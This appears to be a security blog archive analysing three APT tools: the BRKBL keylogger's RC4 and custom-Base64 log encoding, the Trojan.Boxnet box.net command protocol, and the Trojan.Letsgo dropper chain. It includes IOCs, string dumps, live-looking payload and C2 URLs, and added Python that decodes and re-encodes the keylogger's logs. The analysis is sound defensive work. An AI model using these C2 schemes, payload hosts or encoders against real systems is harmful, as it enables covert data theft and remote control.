Author Archives: hbojaxhi

Keylogger.BRKBL

Today I will take a quick look at a keystroke logger whose unpacked version has a much lower detection rate on VT than its UPX-packed version, and which uses RC4 encryption and Base64 encoding with a custom alphabet.

We picked up this file recently while observing some APT activity on a victim’s network, and this is yet another tool in these actors’ arsenal.

This keystroke logger does not have the ability to communicate over the wire, so if you find it in your environment you should look for other Trojans that would give the actors access to your network.

The characteristics of this file are shown below:

File Name:  BRKBL.exe
File Size:  6144 bytes
MD5:        8a4bdb85acdfbf77ccadc3415d848bd7
SHA1:       aa45d3596f00042eb2f0cd5a78d7666b3034f63d
PE Time:    0x49D5CB3B [Fri Apr 03 08:39:23 2009 UTC]
PEID Sig:   UPX 2.90 (LZMA)
VT:         9/43 on 2011-11-07 15:32:12 UTC
VT:         15/43 on 2012-29-02 16:44:27 UTC

Interestingly, the unpacked version of this file has a lower detection rate as of today:

File Name:  BRKBL-unpacked.exe
File Size:  8192 bytes
MD5:        ebdc4d363da8b97ab65df9bf921e1b56
SHA1:       c9754d84d9a2c925c0271ad36e572858637fa1cc
PE Time:    0x49D5CB3B [Fri Apr 03 08:39:23 2009 UTC]
VT:         3/43 on 2012-02-29 15:16:00 UTC

This keystroke logger logs the data in a file named C:\DOCUME~1\username\LOCALS~1\Temp\ade######.Tmp, where ###### is the YYMMDD of when the file is created.

The entrenchment location is: SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

The captured window titles along with any keystrokes are first RC4 encrypted using this 128-bit key (0x02000008000302060001090801000702):

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
00000000   02 00 00 08 00 03 02 06  00 01 09 08 01 00 07 02

In case you have never seen what the RC4 algorithm looks like in assembly, here is a peek at the building of the 256-byte table (0x00 – 0xFF) and the loop that mixes in the key:

Encrypting the data with RC4 is the easy part of the obfuscation employed by this Keystroke logger.

The RC4-encrypted data is then Base64 encoded using a custom alphabet. Typically, the custom alphabet is sitting somewhere within the binary file, so it would be easy to test out (e.g. see http://www.cyberesi.com/2011/11/02/trojan-prime/).

In this keystroke logger the custom alphabet is implemented in logic and is thus not visible. So, I will share with you a little trick that I use to let the Trojan/Keylogger tell me what the alphabet is.

In order to determine the custom alphabet you first need to find the subroutine that encodes the data. The easiest thing to do (at least the first thing I try) to find that subroutine is to put a hardware breakpoint on the first byte of your plaintext. In this case, this hardware breakpoint would have landed you in the RC4 encryption algorithm. Next, you put a hardware breakpoint on the first byte of the RC4-encrypted data, which will land you somewhere in the middle of the subroutine that does the Base64 encoding. In this case, the beginning of the subroutine is at address 0x00401080.

Next, if you look at the argument passed to this subroutine you will see that among other things are:

1.  A pointer to where the RC4 encrypted data is located.
2.  The length of the encrypted data (change this to 0x30)
3.  A pointer to an output buffer (where the encoded data will end up).

The way to trick the keystroke logger (or any other Trojan for that matter) to give us the custom alphabet is to replace the RC4 encrypted data with this raw data:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   00 10 83 10 51 87 20 92  8B 30 D3 8F 41 14 93 51     ƒ Q‡ ’‹0Ó A “Q
00000010   55 97 61 96 9B 71 D7 9F  82 18 A3 92 59 A7 A2 9A   U—a–›qן‚ £’Y§¢š
00000020   AB B2 DB AF C3 1C B3 D3  5D B7 E3 9E BB F3 DF BF   «²Û¯Ã ³Ó]·ãž»óß¿

Where did this data come from, you may be wondering? Well, this data is what you get when you decode the standard Base64 alphabet itself (shown below):

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

And obviously, if you were to Base64 encode the raw data back, you would get the standard alphabet back.

Understanding precisely why this data yields the custom alphabet requires a good understanding of the Base64 algorithm. The basic idea is that this data is special: when the encoding algorithm is run over it, it produces the index values 0 through 63 in order, which forces the Trojan to emit its custom alphabet letters in order. As I said, this trick works on any Trojan that uses Base64.

So, once you pass this data to the algorithm you will find the custom alphabet on the output buffer. This Trojan uses this custom alphabet to Base64 encode the RC4 encrypted data:

16BGLQVafkpuz27CHMRWbglqv-38DINSXchmrw/49EJOTYdinsx0FKPUZejoty5A
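The trick above, as an added Python example (mine, not code from the post or from the keylogger): `alphabet_probe()` is the 48-byte block shown in the hex dump, `recover_alphabet()` feeds it to any Base64-style encoder and reads the alphabet straight off the output, and `rc4()` is the key-scheduling loop and keystream generator described earlier, so both layers can be reversed over a recovered log record. The alphabet and key are the values given in this post; that BRKBL's RC4 is textbook RC4 and that each log record is one Base64 string are assumptions.

```python
import base64

# Standard Base64 alphabet, the custom alphabet the post recovered from BRKBL,
# and the 128-bit RC4 key from the post's hex dump.
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
BRKBL_ALPHABET = "16BGLQVafkpuz27CHMRWbglqv-38DINSXchmrw/49EJOTYdinsx0FKPUZejoty5A"
BRKBL_RC4_KEY = bytes.fromhex("02000008000302060001090801000702")


def alphabet_probe() -> bytes:
    """The 48-byte 'magic' input: Base64-decoding the standard alphabet gives bytes
    whose 6-bit groups are the indices 0..63 in order (00 10 83 10 51 87 ... in the post)."""
    return base64.b64decode(STD_ALPHABET)


def b64_encode_custom(data: bytes, alphabet: str) -> str:
    """Base64 with a caller-supplied 64-character alphabet. No '=' padding is emitted;
    whether BRKBL pads is not stated in the post."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct characters")
    std = base64.b64encode(data).decode("ascii").rstrip("=")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


def b64_decode_custom(text: str, alphabet: str) -> bytes:
    """Inverse of b64_encode_custom; tolerates missing '=' padding."""
    std = text.rstrip("=").translate(str.maketrans(alphabet, STD_ALPHABET))
    return base64.b64decode(std + "=" * (-len(std) % 4))


def recover_alphabet(encoder) -> str:
    """The post's trick, generalised: hand the probe to any Base64-style encoder and
    the output *is* its alphabet, because position i carries index i."""
    out = encoder(alphabet_probe())
    if len(out) != 64 or len(set(out)) != 64:
        raise ValueError("encoder did not behave like Base64 on the probe")
    return out


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4: key scheduling (the 256-byte table plus the key-mixing loop the post shows
    in assembly) followed by the keystream generator; encrypt and decrypt are the same."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA: mix the key into S
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:                            # PRGA: one keystream byte per input byte
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def encode_log_record(plaintext: bytes) -> str:
    """BRKBL's layering as the post describes it: RC4 first, then custom-alphabet Base64."""
    return b64_encode_custom(rc4(BRKBL_RC4_KEY, plaintext), BRKBL_ALPHABET)


def decode_log_record(encoded: str) -> bytes:
    """What an analyst runs over one record recovered from an ade######.Tmp file."""
    return rc4(BRKBL_RC4_KEY, b64_decode_custom(encoded, BRKBL_ALPHABET))


if __name__ == "__main__":
    print(alphabet_probe().hex())
    print(recover_alphabet(lambda d: b64_encode_custom(d, BRKBL_ALPHABET)))
    # Constructed record in the format the post's strings suggest.
    print(decode_log_record(encode_log_record(b"Windows Title: Notepad|hello<Enter>")))
```

Because RC4 is a stream cipher and the key is fixed in the binary, every record is XORed with the same keystream, so one record whose start is known (the "Windows Title: " prefix from the strings) gives the keystream for those positions even before the key has been pulled from the sample.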

Here are the strings of this Trojan (from the unpacked version):

Text strings referenced in BRKBL:.text
Address                              Disassembly                Text string
004012AA                             PUSH BRKBL.00403720        ASCII "Windows Title: %s"
00401450                             PUSH BRKBL.00403740        ASCII "%s <Buffer Full>"
00401475                             PUSH BRKBL.00403734        ASCII "%s<Enter>"
00401584                             PUSH BRKBL.00403760        ASCII "%s\ade%02d%02d%02d.Tmp"
004015B5                             PUSH BRKBL.0040375C        ASCII "%s"
00401618                             PUSH BRKBL.00403758        ASCII "a+"
00401630                             PUSH BRKBL.00403754        ASCII "%s|"
004016A8                             PUSH BRKBL.00403780        ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
004016D4                             PUSH BRKBL.00403778        ASCII "UPDATA"
00401A16 BRKBL.<ModuleEntryPoint>    PUSH EBP                   (Initial CPU selection)
00401B8B                             PUSH 10000                 UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"

Trojan.Boxnet

  • In one of our recent engagements we found an interesting Trojan that we thought was worth blogging about, not because of its capability but rather because of the way it was being controlled.  Jared and I looked at this Trojan together and named it Trojan.Boxnet.

Summary

  • Trojan.Boxnet uses the file sharing site www.box.net as a medium from where it receives commands from the attacker, and where it posts the results of the commands it executes on the host.  Box.net is also used as the medium to where exfiltrated files are posted, and from where additional tools/Trojans are downloaded.  The Trojan contains the credentials of a user account created by the attacker in the binary itself.  For the purposes of this analysis we have removed the original credentials, and inserted the credentials of a temporary account at box.net, created in order to dynamically analyze this Trojan.  This Trojan allows the attacker to do the following on a compromised system:
- List logical drives
- Execute a file
- Recursive directory listing
- Download a file from box.net
- Upload a file to box.net
- List running processes
- Terminate a process
- List Services
- Change the sleep time
  • The credentials we created for this analysis are:
    • Username: general-Tso@binkmail.com
    • Password: iLuvData

Trojan.Boxnet Analysis

  •  The characteristics of this Trojan (with its credentials removed) follow:
File Name:  BOX.exe
File Size:  26112 bytes
MD5:        36ebd337752cf1289178c37ad6884ae1
SHA1:       c098be5db3d00694d9ae7de068050f6e68bdf321
PE Time:    0x4CBCFE04 [Tue Oct 19 02:10:12 2010 UTC]
AV Hits:    6/42 (13.6%) [VirusTotal]
Sections (3):
  Name      Entropy  MD5
  .text     6.32     039c7c3d682f25bb739358e69534c870
  .rdata    4.58     fad0a8972f8674d7e912cb7076ba1738
  .data     4.72     e36ee6cbfb9403a0fe88d4c1ac00ef59
  • When executed, this Trojan starts by creating a mutex named letusgoboxmm1.0 to ensure that only one instance of it is running on the system.
  • As you may recall, if you have read some of our other posts, we analyzed another Trojan recently that creates a similar mutex named letusgohtppmmv2.0.0.1 (Trojan.Letsgo).  So, even though the communication protocols of Trojan.Letsgo and Trojan.Boxnet are completely different, they appear to be related.
  • The Trojan then authenticates with box.net and uploads a file named: RE-victim-192.168.1.9.txt to box.net.  This file contains the following data:
report myself every 18000000
cur time:2011/09/18 01:28:04 Eastern Daylight Time
proxy:PROXY_TYPE_DIRECT
  • So, the filename contains the system name: victim, and its internal IP address: 192.168.1.9.  The content of the posted file reports the Trojan’s sleep time in milliseconds (i.e. 5 hours in this case), as well as the system's current time along with time zone information, and its proxy settings.  The victim then sleeps for 5 hours.
  • The Trojan then looks for a file that starts with “st-” to download from box.net.  The “st-” files are the means through which the attacker issues commands to the victim.  The structure of the “st-” file names is as follows:
    • st-COMMAND-ARGUMENTS.txt.
    • Where COMMAND is an upper case character.
    • ARGUMENTS can be an argument to certain commands.
    • The content of these “st-” filenames is also important for certain commands, while for certain commands no content is expected.
    • If a command-filename file contains data, it is immediately deleted once the file has been downloaded.
  • I think the first file with this name that the Trojan will find in the box.net account is one that will change the sleep time, since the call to sleep is made every time the Trojan is done posting data to box.net.  So, in order to interact with the Trojan, the attacker would need to change the default sleep time of 5 hours to perhaps a few seconds.  In fact, the minimum time that can be specified must be greater than 10 seconds:
00402382      .  83C4 04                 ADD ESP, 4
00402385      .  3D 10270000             CMP EAX, 2710
0040238A      .  0F8E 9E000000           JLE Box.0040242E
  • In order to change the sleep time, the attacker would place a file on box.net that may have the following name: st-W-10001.txt
  • The W command instructs the Trojan to change the default sleep time (think of W as wait perhaps).
  • The second dash is required, and what follows it up to the extension of the filename is converted to an integer using the “atoi” call.  In this case we have specified 10001 milliseconds (i.e. 10.1 seconds).
  • So, this command will make the Trojan look for additional “st-” files more frequently and thus interact with the attacker.
  • Here is a list of the other commands that this Trojan understands:
 Filename:           COMMAND                 TROJAN ACTION
 st-D-.txt          Logical partitions      Uploads RE-victim-192.168.1.9-D.txt
 st-E-.txt          Execute a file          Uploads RE-victim-10001-E.txt
 st-F-#.txt         Recursive dir listing   Uploads RE-victim-192.168.1.9-F.txt
 st-G-file.exe.txt  Download a file         Uploads RE-victim-10001-G.txt
 st-P-.txt          Process list            Uploads RE-victim-192.168.1.9-P.txt
 st-S-.txt          Service list            Uploads RE-victim-192.168.1.9-S.txt
 st-T-.txt          Terminate process       Nothing is posted.
 st-U-.txt          Upload file             Uploads RE-victim-192.168.1.9-test.txt
  • Some additional notes on these commands:
  • Command E: if the execution fails, the Trojan uploads RE-victim-10001-Z.txt
  • Command F: the # specifies the recursive depth to follow.
  • Command G: the downloaded file is saved under: C:\Documents and Settings\username\file.exe
  • Command T: the process to be terminated is specified by its name.
  • Command U: the file to be uploaded is specified in the content of file st-U-.txt
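The st-/RE- file naming convention and the sleep-time check above, as an added Python example (mine, not the post's or the Trojan's code) that an analyst could run over a listing of the box.net account: it splits tasking files from victim reports, pulls the command letter and argument out of an st- name, and applies the same `CMP EAX, 2710 / JLE` rule the disassembly shows, via a C-style `atoi`. The command table is the post's; the report-file pattern follows the `RE-%s-%s-X.txt`, `RE-%s-%d-X.txt` and `UP-%s-%s-%s` format strings in the string dump, and the sample listing is constructed.

```python
import re

# Tasking files from the post: st-COMMAND-ARGUMENTS.txt, COMMAND one upper-case letter.
CMD_FILE_RE = re.compile(r"^st-([A-Z])-(.*)\.txt$")

# Victim-posted files, from the format strings in the dump: RE-<host>-<ip>[-X].txt,
# RE-<host>-<number>-X.txt, UP-<host>-<ip>-<name>. Hostnames may contain '-', so the host
# is matched lazily and the third field must be an IPv4 address or a plain integer.
REPORT_FILE_RE = re.compile(
    r"^(RE|UP)-(.+?)-(\d{1,3}(?:\.\d{1,3}){3}|\d+)(?:-([^-]+))?\.txt$")

# Command letters and actions, from the post's table.
COMMANDS = {
    "W": "change sleep time (argument = milliseconds)",
    "D": "list logical drives",
    "E": "execute a file",
    "F": "recursive directory listing (argument = depth)",
    "G": "download a file from box.net (argument = file name)",
    "P": "list running processes",
    "S": "list services",
    "T": "terminate a process (name in file content)",
    "U": "upload a file (path in file content)",
}

# CMP EAX, 2710 / JLE reject: a new sleep value is adopted only if it is > 10000 ms.
SLEEP_FLOOR_MS = 0x2710


def c_atoi(s: str) -> int:
    """Mimic C atoi(): skip leading whitespace, optional sign, digits; 0 if no digits."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def accepted_sleep_ms(argument: str):
    """Milliseconds the Trojan would adopt from an st-W file, or None if it would ignore it."""
    ms = c_atoi(argument)
    return ms if ms > SLEEP_FLOOR_MS else None


def parse_command_file(name: str):
    """Return (command, argument, action) for an st- tasking file name, else None."""
    m = CMD_FILE_RE.match(name)
    if not m:
        return None
    cmd, arg = m.group(1), m.group(2)
    return cmd, arg, COMMANDS.get(cmd, "unknown command")


def parse_report_file(name: str):
    """Return (prefix, host, ip_or_number, suffix_or_None) for a victim-posted file, else None."""
    m = REPORT_FILE_RE.match(name)
    return m.groups() if m else None


def triage_listing(names):
    """Split a box.net folder listing into tasking files, victim reports and the rest."""
    tasking, reports, other = [], [], []
    for n in names:
        if parse_command_file(n):
            tasking.append(n)
        elif parse_report_file(n):
            reports.append(n)
        else:
            other.append(n)
    return tasking, reports, other


if __name__ == "__main__":
    # Constructed listing built from names that appear in the post.
    listing = ["st-W-10001.txt", "st-F-3.txt", "RE-victim-192.168.1.9.txt",
               "RE-victim-192.168.1.9-D.txt", "RE-victim-10001-E.txt", "readme.txt"]
    print(triage_listing(listing))
    for n in listing:
        parsed = parse_command_file(n)
        if parsed and parsed[0] == "W":
            print(n, "-> sleep accepted:", accepted_sleep_ms(parsed[1]))
```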
  • Here is a string dump from this Trojan:
Text strings referenced in Box:.text
Address    Disassembly                               Text string
00401092   PUSH Box.00407118                         ASCII "%d:%s %d    "
004011CD   PUSH Box.00407124                         ASCII 0A,"     Execu"
004013AB   PUSH Box.00407148                         ASCII "USERPROFILE"
004013B9   PUSH Box.00407140                         ASCII "windir"
004014BE   PUSH Box.00407154                         ASCII "Display Name      : %s
Service Name      : %s
Process Id      : %04x (%d) "
004015BB   PUSH Box.004071B4                         ASCII "%s\"
004015C2   MOV EDI, Box.004071AC                     ASCII "\*.*"
00401696   PUSH Box.004071A4                         ASCII "%s\%s"
004016C9   PUSH Box.0040719C                         ASCII "%s\%s"
00401790   PUSH Box.004071E0                         ASCII "%s"
004017DD   MOV EDI, Box.004071D8                     ASCII "     CDROM"
004017E4   MOV EDI, Box.004071C8                     ASCII "     Remove Disk"
004017EB   MOV EDI, Box.004071BC                     ASCII "     Hard Disk"
004018CE   PUSH Box.00407248                         ASCII "InternetQueryOption failed! (%d)"
004018E1   PUSH Box.00407244                         ASCII "%"
00401902   PUSH Box.00407224                         ASCII "PROXY_TYPE_AUTO_PROXY_URL:%s"
00401921   PUSH Box.0040720C                         ASCII "PROXY_TYPE_AUTO_DETECT"
0040193C   PUSH Box.004071F8                         ASCII "PROXY_TYPE_PROXY:%s"
00401958   PUSH Box.004071E4                         ASCII "PROXY_TYPE_DIRECT"
00401A86   PUSH Box.004072C8                         ASCII "letusgoboxmm1.0"
00401AB0   MOV EDI, Box.004072C4                     ASCII "st-"
00401ABA   PUSH Box.00407BD4                         ASCII "C:\Documents and Settings\username"
00401AC5   PUSH Box.00407AD0                         ASCII "C:\WINDOWS"
00401ACE   MOV EDI, Box.00407ABC                     ASCII "st-"
00401AD3   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401ADF   PUSH Box.00407CD8                         ASCII "victim"
00401AEE   PUSH Box.004079B8                         ASCII "PROXY_TYPE_DIRECT"
00401B60   PUSH Box.0040729E                         ASCII "iLuvData"
00401B65   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401C6F   PUSH Box.004073D8                         ASCII "%Y/%m/%d %X %z"
00401CAD   XOR EAX, EAX                              (Initial CPU selection)
00401CCF   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401CD8   PUSH Box.00407CD8                         ASCII "victim"
00401CE4   PUSH Box.004073C8                         ASCII "RE-%s-%s-P.txt"
00401CF3   PUSH Box.0040729E                         ASCII "iLuvData"
00401CF8   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401D46   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401D50   PUSH Box.00407CD8                         ASCII "victim"
00401D5D   PUSH Box.004073B8                         ASCII "RE-%s-%s-D.txt"
00401D6A   PUSH Box.0040729E                         ASCII "iLuvData"
00401D6F   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401E17   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401E20   PUSH Box.00407CD8                         ASCII "victim"
00401E2C   PUSH Box.004073A8                         ASCII "RE-%s-%s-F.txt"
00401E3B   PUSH Box.0040729E                         ASCII "iLuvData"
00401E40   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401E6C   MOV EDI, Box.00407398                     ASCII "list file error"
00401EA6   PUSH Box.00407CD8                         ASCII "victim"
00401EB1   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00401EBE   PUSH Box.0040729E                         ASCII "iLuvData"
00401EC3   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401EEF   PUSH Box.00407384                         ASCII "rb"
00401F26   PUSH Box.0040737C                         ASCII "open"
00401F4A   PUSH Box.00407CD8                         ASCII "victim"
00401F55   PUSH Box.0040736C                         ASCII "RE-%s-%d-E.txt"
00401F62   PUSH Box.0040729E                         ASCII "iLuvData"
00401F67   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401F99   MOV EDI, Box.0040735C                     ASCII "execute error"
00401FE3   PUSH Box.00407CD8                         ASCII "victim"
00401FE8   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00402011   PUSH Box.00407BD4                         ASCII "C:\Documents and Settings\username"
0040201C   PUSH Box.004071A4                         ASCII "%s\%s"
00402031   PUSH Box.00407358                         ASCII "wb+"
0040209C   PUSH Box.00407CD8                         ASCII "victim"
004020A7   PUSH Box.00407348                         ASCII "RE-%s-%d-G.txt"
004020C1   MOV EDI, Box.00407334                     ASCII "get save file error"
0040210B   PUSH Box.00407CD8                         ASCII "victim"
00402110   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00402119   PUSH Box.0040729E                         ASCII "iLuvData"
0040211E   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004021B2   PUSH Box.00407384                         ASCII "rb"
0040222C   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00402231   PUSH Box.00407CD8                         ASCII "victim"
0040223C   PUSH Box.00407328                         ASCII "UP-%s-%s-%s"
00402255   PUSH Box.0040729E                         ASCII "iLuvData"
0040225A   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004022B0   PUSH Box.00407D3C                         ASCII "10.125.2.150"
004022B9   PUSH Box.00407CD8                         ASCII "victim"
004022C5   PUSH Box.00407318                         ASCII "RE-%s-%s-S.txt"
004022D4   PUSH Box.0040729E                         ASCII "iLuvData"
004022D9   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004023B9   PUSH Box.004079B8                         ASCII "PROXY_TYPE_DIRECT"
004023C0   PUSH Box.004072E8                         ASCII "report myself every %dcur time:%sproxy:%s"
004023D6   PUSH Box.00407D3C                         ASCII "10.125.2.150"
004023E0   PUSH Box.00407CD8                         ASCII "victim"
004023ED   PUSH Box.004072D8                         ASCII "RE-%s-%s.txt"
004023F6   PUSH Box.0040729E                         ASCII "iLuvData"
004023FB   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00402522   MOV EDI, Box.00407414                     ASCII "http://www.box.net/index.php?rm=box_delete_items"
00402547   MOV EDI, Box.004073FC                     ASCII "q[item_typed_ids][0]=f_"
0040259B   MOV EDI, Box.004073EC                     ASCII "&request_token="
00402A19   MOV EDI, Box.00407520                     ASCII "https://www.box.net/login"
00402A77   MOV EDI, Box.0040750C                     ASCII "http://www.box.net"
00402A8E   PUSH Box.0040750C                         ASCII "http://www.box.net"
00402B34   PUSH Box.004074F8                         ASCII "request_token = '"
00402B53   MOV EDI, Box.004074F8                     ASCII "request_token = '"
00402BA2   MOV EDI, Box.00407520                     ASCII "https://www.box.net/login"
00402BD4   MOV EDI, Box.004074EC                     ASCII "login="
00402C2B   MOV EDI, Box.004074E0                     ASCII "&password="
00402C90   MOV EDI, Box.00407448                     ASCII "&remember_login=on&__login=1&reg_step=&submit1=1&folder=&skip_framework_login=&login_or_register_m
00402DAF   MOV EDI, Box.00407540                     ASCII "Content-Type: multipart/form-data; boundary="
00402E09   MOV EDI, Box.0040753C                     ASCII ""
00403009   MOV ESI, Box.00407734                     ASCII "----------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3"
00403024   MOV ESI, Box.00407704                     ASCII "------------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3"
00403037   MOV ESI, Box.004076D4                     ASCII "------------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3--"
00403099   MOV EDI, Box.004076A0                     ASCII "Content-Disposition: form-data; name="Filename""
004030C7   MOV EDI, Box.0040753C                     ASCII ""
00403124   MOV EDI, Box.0040753C                     ASCII ""
004031BC   MOV EDI, Box.00407664                     ASCII "Content-Disposition: form-data; name="Filedata"; filename=""
00403218   MOV EDI, Box.00407660                     ASCII """
00403247   MOV EDI, Box.00407634                     ASCII "Content-Type: application/octet-stream"
00403279   MOV EDI, Box.0040753C                     ASCII ""
0040330C   MOV EDI, Box.0040753C                     ASCII ""
0040339E   MOV EDI, Box.00407604                     ASCII "Content-Disposition: form-data; name="Upload""
004033C9   MOV EDI, Box.0040753C                     ASCII ""
004033F8   MOV EDI, Box.004075F4                     ASCII "Submit Query"
00403484   MOV EDI, Box.00407594                     ASCII "http://upload.box.net/index.php?rm=box_v2_flash_upload&folder_id=d_0&description=&PHPSESSID="
004034DE   MOV EDI, Box.00407570                     ASCII "&thumbnail_to_create=small_thumb"
00403719   MOV EDI, Box.004077C4                     ASCII "https://www.box.net//files"
00403819   MOV EDI, Box.0040750C                     ASCII "http://www.box.net"
00403830   PUSH Box.0040750C                         ASCII "http://www.box.net"
004038E3   PUSH Box.004074F8                         ASCII "request_token = '"
0040390F   MOV EDI, Box.004074F8                     ASCII "request_token = '"
00403978   PUSH Box.004077B4                         ASCII ""typed_id":"f_"
00403989   MOV EDI, Box.004077B4                     ASCII ""typed_id":"f_"
004039CB   PUSH Box.004077A4                         ASCII ""name":""
004039E0   MOV EDI, Box.004077A4                     ASCII ""name":""
00403A34   PUSH Box.00407ABC                         ASCII "st-"
00403A89   MOV EDI, Box.00407ABC                     ASCII "st-"
00403B06   MOV EDI, Box.00407760                     ASCII "http://www.box.net/index.php?rm=box_v2_download_file&file_id=f_"
00403C91   MOV EDI, Box.004077E0                     ASCII "Content-Type: application/x-www-form-urlencoded"
00404544   PUSH Box.0040781C                         ASCII "https"
00404564   PUSH Box.00407814                         ASCII "http"
004046AE   PUSH Box.00407830                         ASCII "Mozilla/4.0 (compatible; )"
004046E0   PUSH Box.00407824                         ASCII "selfset:%d"
004047B8   MOV DWORD PTR SS:[ESP+1C], Box.0040786C   ASCII "*/*"
0040481E   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404824   PUSH Box.0040785C                         ASCII "GET"
00404846   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
0040485B   PUSH Box.0040784C                         ASCII "Accept: */*"
004049B8   MOV DWORD PTR SS:[ESP+1C], Box.0040786C   ASCII "*/*"
00404A34   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404A3D   PUSH Box.00407870                         ASCII "POST"
00404A5F   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
00404A7A   PUSH Box.0040784C                         ASCII "Accept: */*"
00404C0F   MOV DWORD PTR SS:[ESP+20], Box.0040786C   ASCII "*/*"
00404C98   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404C9E   PUSH Box.00407870                         ASCII "POST"
00404CC0   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
00404CD5   PUSH Box.0040784C                         ASCII "Accept: */*"
00404DB7   PUSH Box.00407878                         ASCII "Content-Length: %d"
00404F6B   PUSH Box.00407898                         ASCII "Set-Cookie: "
00405079   PUSH Box.00407898                         ASCII "Set-Cookie: "
004054BF   PUSH 10000                                UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"

Trojan.Letsgo analysis

  • Today I will write about a Trojan that I will refer to as Trojan.Letsgo and some interesting artifacts I was able to recover from its C2 node located in China.
  • However, before I write about Trojan.Letsgo, I have to talk about another Trojan that is very similar to other samples I have blogged about, that led me to Trojan.Letsgo.
  • Today’s journey begins with a spear-phishing email that was mentioned here: http://www.lottaworld.com/images/fake_sasc_f-16.jpg
  • The email contained a URL to a malicious file (no longer available): http://news.kmmowery.org/forum/f-16_sale.zip
  • If you are interested in obtaining a sample of this file please let me know.
  • This zip file contains a self extracting executable that is made to look like a folder, which has the following characteristics:
File Name:  US Arms Sales to Taiwan About F-16                                                             .exe
File Size:  146885 bytes
MD5:        2b1c03b4e34a123e5317182e6159e38a
SHA1:       1b4647c711f15b66bebe593ac215f0165fa12db8
PE Time:    0x4894133F [Sat Aug 02 07:56:47 2008 UTC]
PEID Sig:   RAR SFX
Sections (4):
 Name      Entropy  MD5
 .text     6.39     4b84ca66055922ffe3b7d0a45b63ad99
 .data     5.98     3fd04642b046387c6fd670a5951dfef8
 .idata    4.94     f85c9601de742e0bc2de9d7b285351dc
 .rsrc     5.15     d1b129bbe18e46e3b483a3f728bd87f6
  • This self-extracting executable contains an SFX script that copies and executes a malicious file on the system. When you open the file with WinRAR you can see the script:
;The comment below contains the self-extracting script commands

Path=%temp%
SavePath
Setup=%temp%\cisvc.exe
Silent=1
Overwrite=2
  • So, the “payload” if you will, of this self-extracting file has the following characteristics:
File Name:  cisvc.exe
File Size:  14336 bytes
MD5:        bcd2a7361d0a91a51123102a876c7af8
SHA1:       0ef31fea97a4938c59c92bacd1ea615bb8ca7659
PE Time:    0x4DA666E1 [Thu Apr 14 03:15:45 2011 UTC]
AV:         23/42 (54.8%) [VirusTotal]
Sections (3):
 Name      Entropy  MD5
 .text     6.1      1438df054ddec45c195c480250b6423f
 .rdata    4.49     cfb3a3f65536ef8c42452105c7e1e4c4
 .data     3.48     e09139527926e2c2a74ff253a2ff03c6
  • This file was submitted to VirusTotal on 19 MAY 2011 and it has decent coverage there, except that the two major vendors, Symantec and McAfee, did not identify it as malicious.
  • The behavior of this Trojan is similar to other samples that I have analyzed, in that, this Trojan:
    1. requests an HTML page (http://122.147.13.8/new/iistart.html)
    2. parses it for the comment tags
    3. Base64 decodes the message contained in the tag, and
    4. either downloads and executes a file, or sleeps.
  • The biggest difference between this sample and previous ones is that this sample has a rather complex decryption algorithm for the file it downloads and executes.
  • On 8 June 2011, this Trojan was instructed to download a file named update.gif:
 GET /new/iistart.html HTTP/1.1
 Accept: */*
 User-Agent: lt-764-238+Windows+NT+5.171
 Host: 122.147.13.8

 HTTP/1.1 200 OK
 Content-Length: 44
 Content-Type: text/html
 Last-Modified: Wed, 08 Jun 2011 00:19:01 GMT
 Accept-Ranges: bytes
 ETag: "a67db3aa7125cc1:102d"
 Server: Microsoft-IIS/6.0
 MicrosoftOfficeWebServer: 5.0_Pub
 X-Powered-By: ASP.NET
 Date: Wed, 08 Jun 2011 00:42:37 GMT

 
  • The instruction decodes to:
d:202.105.39.39 update.gif
  • So, the Trojan is instructed to download file: http://202.105.39.39/update.gif. This file is still hosted on this site as of the day of this post.
  • This file is decrypted by cisvc.exe to produce the following file, which I have named Trojan.Letsgo:
File Name:  update.exe
